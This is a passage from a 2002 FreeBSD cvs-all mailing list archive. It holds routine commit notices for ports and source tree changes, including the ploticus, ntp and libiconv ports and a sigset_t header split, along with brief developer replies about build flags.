g5GFw2L91935; Sun, 16 Jun 2002 08:58:02 -0700 (PDT) (envelope-from ade) Message-Id: <200206161558.g5GFw2L91935@freefall.freebsd.org> From: Ade Lovett Date: Sun, 16 Jun 2002 08:58:02 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules ports/databases Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ade 2002/06/16 08:58:02 PDT Modified files: . modules databases Makefile Log: Hook databases/db33 into the build. Revision Changes Path 1.5366 +1 -0 CVSROOT/modules 1.190 +1 -0 ports/databases/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 9:22: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0231A37B405; Sun, 16 Jun 2002 09:22:05 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GGM4o99358; Sun, 16 Jun 2002 09:22:04 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206161622.g5GGM4o99358@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sun, 16 Jun 2002 09:22:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/math/ploticus Makefile distinfo pkg-plist ports/math/ploticus/files patch-Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/16 09:22:04 PDT Modified files: math/ploticus Makefile distinfo pkg-plist math/ploticus/files patch-Makefile Log: upgrade to 2.04 use new REINPLACE_CMD for patch Revision Changes Path 1.3 +2 -4 ports/math/ploticus/Makefile 1.3 +1 -1 ports/math/ploticus/distinfo 1.3 +19 -25 ports/math/ploticus/files/patch-Makefile 1.3 +6 -0 ports/math/ploticus/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 10: 7:57 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AA9E037B406; Sun, 16 Jun 2002 10:07:55 -0700 (PDT) Received: (from clive@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GH7tK07543; Sun, 16 Jun 2002 10:07:55 -0700 (PDT) (envelope-from clive) Message-Id: <200206161707.g5GH7tK07543@freefall.freebsd.org> From: Clive Lin Date: Sun, 16 Jun 2002 10:07:55 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/chinese/mutt Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG clive 2002/06/16 10:07:55 PDT Modified files: chinese/mutt Makefile distinfo Log: Catch up with mail/mutt-devel. Noted by: vanilla Revision Changes Path 1.20 +3 -3 ports/chinese/mutt/Makefile 1.22 +6 -6 ports/chinese/mutt/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 10:44:59 2002 Delivered-To: cvs-all@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-56.dsl.lsan03.pacbell.net [63.207.60.56]) by hub.freebsd.org (Postfix) with ESMTP id C496B37B404; Sun, 16 Jun 2002 10:44:54 -0700 (PDT) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 64E2366D51; Sun, 16 Jun 2002 10:44:54 -0700 (PDT) Date: Sun, 16 Jun 2002 10:44:54 -0700 From: Kris Kennaway To: Maxim Sobolev Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/net/ntp Makefile Message-ID: <20020616104454.B23689@xor.obsecurity.org> References: <200206161252.g5GCq1j47904@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="sdtB3X0nJg68CQEu" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206161252.g5GCq1j47904@freefall.freebsd.org>; from sobomax@FreeBSD.org on Sun, Jun 16, 2002 at 05:52:01AM -0700 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --sdtB3X0nJg68CQEu Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable ntp-devel has the same problem. Kris On Sun, Jun 16, 2002 at 05:52:01AM -0700, Maxim Sobolev wrote: > sobomax 2002/06/16 05:52:01 PDT >=20 > Modified files: > net/ntp Makefile=20 > Log: > Don't use command like the following "tar --exclude ".*" -cf foo.bar ." > because `.' itself gets excluded and therefore no files are added into > arcive. This should unbreak package on -current with new tar. > =20 > Reported by: kris > =20 > Revision Changes Path > 1.28 +1 -1 ports/net/ntp/Makefile > http://cvsweb.FreeBSD.org/ports/net/ntp/Makefile.diff?r1=3D1.27&r2=3D1.28 --sdtB3X0nJg68CQEu Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9DM6VWry0BWjoQKURAjwsAJ45jO7HSRa1dwvZA99uRWplbL/EaQCfRXen fZx37VKnin8hsTvNc8273Gg= =zZTy -----END PGP SIGNATURE----- --sdtB3X0nJg68CQEu-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 10:50:54 2002 Delivered-To: cvs-all@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-56.dsl.lsan03.pacbell.net [63.207.60.56]) by hub.freebsd.org (Postfix) with ESMTP id 5711D37B407; Sun, 16 Jun 2002 10:50:42 -0700 (PDT) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id EEEDB66DFA; Sun, 16 Jun 2002 10:50:41 -0700 (PDT) Date: Sun, 16 Jun 2002 10:50:41 -0700 From: Kris Kennaway To: Maxim Sobolev Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src Makefile.inc1 Message-ID: <20020616105041.D23689@xor.obsecurity.org> References: <200206161424.g5GEOqo76198@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="69pVuxX8awAiJ7fD" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206161424.g5GEOqo76198@freefall.freebsd.org>; from sobomax@FreeBSD.org on Sun, Jun 16, 2002 at 07:24:52AM -0700 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --69pVuxX8awAiJ7fD Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sun, Jun 16, 2002 at 07:24:52AM -0700, Maxim Sobolev wrote: > sobomax 2002/06/16 07:24:52 PDT >=20 > Modified files: > . Makefile.inc1=20 > Log: > Don't try to build libssh if NO_OPENSSL is defined because NO_OPENSSL i= mplies > NO_OPENSSH. Historically we've required that people set both, i.e. they're not covering locks. If you want to make them into covering locks then you'll have a lot more work on your hands, because this change is not complete. Kris --69pVuxX8awAiJ7fD Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD4DBQE9DM/xWry0BWjoQKURAp0OAJdPyqnbkmP+UnUv6NgIfLCxdWuWAKCZKTSH DDZyypbnK9kfUrt5eeKAfQ== =Uv9Y -----END PGP SIGNATURE----- --69pVuxX8awAiJ7fD-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 10:56: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8143B37B40F; Sun, 16 Jun 2002 10:56:04 -0700 (PDT) Received: (from sumikawa@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GHu4P12575; Sun, 16 Jun 2002 10:56:04 -0700 (PDT) (envelope-from sumikawa) Message-Id: <200206161756.g5GHu4P12575@freefall.freebsd.org> From: Munechika SUMIKAWA Date: Sun, 16 Jun 2002 10:56:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/uclmmbase Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sumikawa 2002/06/16 10:56:04 PDT Modified files: devel/uclmmbase Makefile Log: Add 'ipv6' on CATEGORIES. Revision Changes Path 1.8 +1 -1 ports/devel/uclmmbase/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 11: 2:54 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2B60737B414; Sun, 16 Jun 2002 11:02:51 -0700 (PDT) Received: (from jesper@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GI2pQ13517; Sun, 16 Jun 2002 11:02:51 -0700 (PDT) (envelope-from jesper) Message-Id: <200206161802.g5GI2pQ13517@freefall.freebsd.org> From: Jesper Skriver Date: Sun, 16 Jun 2002 11:02:51 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/p5-JUNOScript Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jesper 2002/06/16 11:02:51 PDT Modified files: net/p5-JUNOScript Makefile distinfo Log: Upgrade to 5.3R2.4 Revision Changes Path 1.4 +3 -3 ports/net/p5-JUNOScript/Makefile 1.3 +1 -1 ports/net/p5-JUNOScript/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 11: 7:25 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 189B837B40B; Sun, 16 Jun 2002 11:07:19 -0700 (PDT) Received: (from nsayer@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GI7JE17941; Sun, 16 Jun 2002 11:07:19 -0700 (PDT) (envelope-from nsayer) Message-Id: <200206161807.g5GI7JE17941@freefall.freebsd.org> From: Nick Sayer Date: Sun, 16 Jun 2002 11:07:19 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/wi if_wi_pci.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nsayer 2002/06/16 11:07:18 PDT Modified files: (Branch: RELENG_4) sys/dev/wi if_wi_pci.c Log: MFC: Add support for USR PCI adapter Revision Changes Path 1.8.2.3 +1 -0 src/sys/dev/wi/if_wi_pci.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 11:17:31 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1F3DC37B405; Sun, 16 Jun 2002 11:17:25 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GIHPi19252; Sun, 16 Jun 2002 11:17:25 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206161817.g5GIHPi19252@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sun, 16 Jun 2002 11:17:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/audio/cmt Makefile ports/audio/cmt/files patch-cmt.cpp patch-makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/16 11:17:25 PDT Modified files: audio/cmt Makefile audio/cmt/files patch-makefile Added files: audio/cmt/files patch-cmt.cpp Log: fix patch use REINPLACE_CMD bump PORTREVISION PR: 39313 Submitted by: maintainer Revision Changes Path 1.2 +4 -15 ports/audio/cmt/Makefile 1.1 +15 -0 ports/audio/cmt/files/patch-cmt.cpp (new) 1.2 +8 -8 ports/audio/cmt/files/patch-makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 11:20:39 2002 Delivered-To: cvs-all@freebsd.org Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by hub.freebsd.org (Postfix) with ESMTP id 7564237B40D; Sun, 16 Jun 2002 11:20:34 -0700 (PDT) Received: from FreeBSD.org (12-234-90-219.client.attbi.com [12.234.90.219]) by mail-relay1.yahoo.com (Postfix) with ESMTP id 2DF6A8B5C5; Sun, 16 Jun 2002 11:20:34 -0700 (PDT) Message-ID: <3D0CD6F2.86EB2958@FreeBSD.org> Date: Sun, 16 Jun 2002 11:20:34 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.5-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: Maxim Sobolev , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src Makefile.inc1 References: <200206161424.g5GEOqo76198@freefall.freebsd.org> <20020616105041.D23689@xor.obsecurity.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Kris Kennaway wrote: > > On Sun, Jun 16, 2002 at 07:24:52AM -0700, Maxim Sobolev wrote: > > sobomax 2002/06/16 07:24:52 PDT > > > > Modified files: > > . Makefile.inc1 > > Log: > > Don't try to build libssh if NO_OPENSSL is defined because NO_OPENSSL implies > > NO_OPENSSH. > > Historically we've required that people set both, i.e. they're not > covering locks. If you want to make them into covering locks then > you'll have a lot more work on your hands, because this change is not > complete. Also, people might have their own version of openssl lying around for ssh to link with. -- "We have known freedom's price. We have shown freedom's power. And in this great conflict, ... we will see freedom's victory." - George W. Bush, President of the United States State of the Union, January 28, 2002 Do YOU Yahoo!? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 11:32:24 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A4C9537B412; Sun, 16 Jun 2002 11:32:11 -0700 (PDT) Received: (from olgeni@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GIWB021550; Sun, 16 Jun 2002 11:32:11 -0700 (PDT) (envelope-from olgeni) Message-Id: <200206161832.g5GIWB021550@freefall.freebsd.org> From: Jimmy Olgeni Date: Sun, 16 Jun 2002 11:32:11 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/sysutils/webmin Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG olgeni 2002/06/16 11:32:11 PDT Modified files: sysutils/webmin Makefile distinfo Log: Update modules: postgresql, sendmail. Revision Changes Path 1.115 +3 -2 ports/sysutils/webmin/Makefile 1.89 +2 -0 ports/sysutils/webmin/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 11:34: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BA16E37B405; Sun, 16 Jun 2002 11:33:59 -0700 (PDT) Received: (from wollman@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GIXxi21676; Sun, 16 Jun 2002 11:33:59 -0700 (PDT) (envelope-from wollman) Message-Id: <200206161833.g5GIXxi21676@freefall.freebsd.org> From: Garrett Wollman Date: Sun, 16 Jun 2002 11:33:59 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sys _sigset.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG wollman 2002/06/16 11:33:59 PDT Modified files: sys/sys _sigset.h Log: Delete everything except the sigset_t definitions (subsequent to repo-copy). Revision Changes Path 1.31 +3 -252 src/sys/sys/_sigset.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 11:35:29 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0A3B837B408; Sun, 16 Jun 2002 11:35:25 -0700 (PDT) Received: (from wollman@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GIZPS21825; Sun, 16 Jun 2002 11:35:25 -0700 (PDT) (envelope-from wollman) Message-Id: <200206161835.g5GIZPS21825@freefall.freebsd.org> From: Garrett Wollman Date: Sun, 16 Jun 2002 11:35:24 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sys signal.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG wollman 2002/06/16 11:35:24 PDT Modified files: sys/sys signal.h Log: Use to get declaration of sigset_t, which has been moved to a separate header to facilitate its declaration in more than one place. Namespace issues not fixed. Revision Changes Path 1.31 +3 -16 src/sys/sys/signal.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 11:40:19 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B152D37B40D; Sun, 16 Jun 2002 11:40:16 -0700 (PDT) Received: (from wollman@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GIeGP22298; Sun, 16 Jun 2002 11:40:16 -0700 (PDT) (envelope-from wollman) Message-Id: <200206161840.g5GIeGP22298@freefall.freebsd.org> From: Garrett Wollman Date: Sun, 16 Jun 2002 11:40:16 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sys select.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG wollman 2002/06/16 11:40:16 PDT Modified files: sys/sys select.h Log: Now that we have a separate header file for sigset_t, use it and avoid the full pollution of . Revision Changes Path 1.13 +8 -4 src/sys/sys/select.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 11:49:23 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0F3BE37B40B; Sun, 16 Jun 2002 11:49:20 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GInKc23204; Sun, 16 Jun 2002 11:49:20 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206161849.g5GInKc23204@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sun, 16 Jun 2002 11:49:19 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/ftp/downloader/files patch-dqueue.cc patch-hproxy.cc patch-httpd.cc X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/16 11:49:19 PDT Added files: ftp/downloader/files patch-dqueue.cc patch-hproxy.cc patch-httpd.cc Log: fix build with gcc3 PR: 39359 Submitted by: Jan Stocker Revision Changes Path 1.1 +11 -0 ports/ftp/downloader/files/patch-dqueue.cc (new) 1.1 +11 -0 ports/ftp/downloader/files/patch-hproxy.cc (new) 1.1 +11 -0 ports/ftp/downloader/files/patch-httpd.cc (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 11:50:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 58AA937B432; Sun, 16 Jun 2002 11:50:44 -0700 (PDT) Received: (from lioux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GIoih23920; Sun, 16 Jun 2002 11:50:44 -0700 (PDT) (envelope-from lioux) Message-Id: <200206161850.g5GIoih23920@freefall.freebsd.org> From: Mario Sergio Fujikawa Ferreira Date: Sun, 16 Jun 2002 11:50:44 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/games/halflifeserver Makefile ports/games/hlserver-cs Makefile ports/games/q3server Makefile ports/games/q3server-ra3 Makefile ports/games/utserver Makefile ports/games/utserver-to Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG lioux 2002/06/16 11:50:44 PDT Modified files: games/halflifeserver Makefile games/hlserver-cs Makefile games/q3server Makefile games/q3server-ra3 Makefile games/utserver Makefile games/utserver-to Makefile Log: Add USE_PERL5 since perl is required to run a script inside the Makefile. Adding USE_PERL5 is mandatory since it is no longer available in base system of -CURRENT. Approved by: maintaner (only not utserver* ports) Revision Changes Path 1.34 +1 -0 ports/games/halflifeserver/Makefile 1.28 +1 -0 ports/games/hlserver-cs/Makefile 1.5 +1 -0 ports/games/q3server-ra3/Makefile 1.8 +1 -0 ports/games/q3server/Makefile 1.4 +1 -0 ports/games/utserver-to/Makefile 1.6 +1 -0 ports/games/utserver/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 12: 0:49 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1E1D937B489; Sun, 16 Jun 2002 12:00:33 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GJ0XU24990; Sun, 16 Jun 2002 12:00:33 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206161900.g5GJ0XU24990@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sun, 16 Jun 2002 12:00:33 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/rsync Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/16 12:00:33 PDT Modified files: net/rsync Makefile Log: fix REINPLACE_CMD last commit PR: 39365 Submitted by: maintainer Revision Changes Path 1.72 +2 -0 ports/net/rsync/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 12: 3:15 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 79C4437B434; Sun, 16 Jun 2002 12:03:10 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GJ3AY25483; Sun, 16 Jun 2002 12:03:10 -0700 (PDT) (envelope-from marcus) Message-Id: <200206161903.g5GJ3AY25483@freefall.freebsd.org> From: Joe Marcus Clarke Date: Sun, 16 Jun 2002 12:03:10 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/galeon Makefile ports/www/galeon/files patch-src_mozilla_TOCProtocolHandler.cpp X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/16 12:03:10 PDT Modified files: www/galeon Makefile Added files: www/galeon/files patch-src_mozilla_TOCProtocolHandler.cpp Log: Fix build on -CURRENT. Revision Changes Path 1.77 +9 -1 ports/www/galeon/Makefile 1.1 +11 -0 ports/www/galeon/files/patch-src_mozilla_TOCProtocolHandler.cpp (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 12:11:14 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 85B8437B42A; Sun, 16 Jun 2002 12:11:11 -0700 (PDT) Received: (from marcus@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GJBB730445; Sun, 16 Jun 2002 12:11:11 -0700 (PDT) (envelope-from marcus) Message-Id: <200206161911.g5GJBB730445@freefall.freebsd.org> From: Joe Marcus Clarke Date: Sun, 16 Jun 2002 12:11:11 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/converters/libiconv Makefile distinfo ports/converters/libiconv/files patch-ad patch-include::iconv.h.in patch-lib_loop-unicode.h patch-src_Makefile.in X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG marcus 2002/06/16 12:11:11 PDT Modified files: converters/libiconv Makefile distinfo converters/libiconv/files patch-ad patch-include::iconv.h.in patch-lib_loop-unicode.h Added files: converters/libiconv/files patch-src_Makefile.in Log: Update to 1.8, and retain shared lib version of 3. Reviewed by: sobomax Revision Changes Path 1.20 +4 -8 ports/converters/libiconv/Makefile 1.7 +1 -1 ports/converters/libiconv/distinfo 1.6 +3 -6 ports/converters/libiconv/files/patch-ad 1.2 +7 -6 ports/converters/libiconv/files/patch-include::iconv.h.in 1.2 +4 -4 ports/converters/libiconv/files/patch-lib_loop-unicode.h 1.1 +11 -0 ports/converters/libiconv/files/patch-src_Makefile.in (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 12:13:27 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A524A37B410; Sun, 16 Jun 2002 12:13:20 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5GJDK730861; Sun, 16 Jun 2002 12:13:20 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206161913.g5GJDK730861@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sun, 16 Jun 2002 12:13:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/lang/nhc98 Makefile distinfo pkg-plist ports/lang/nhc98/files patch-Makefile patch-include::localmalloc.h patch-script::confhat patch-src::greencard::Makefile patch-src::hat::lib::Makefile 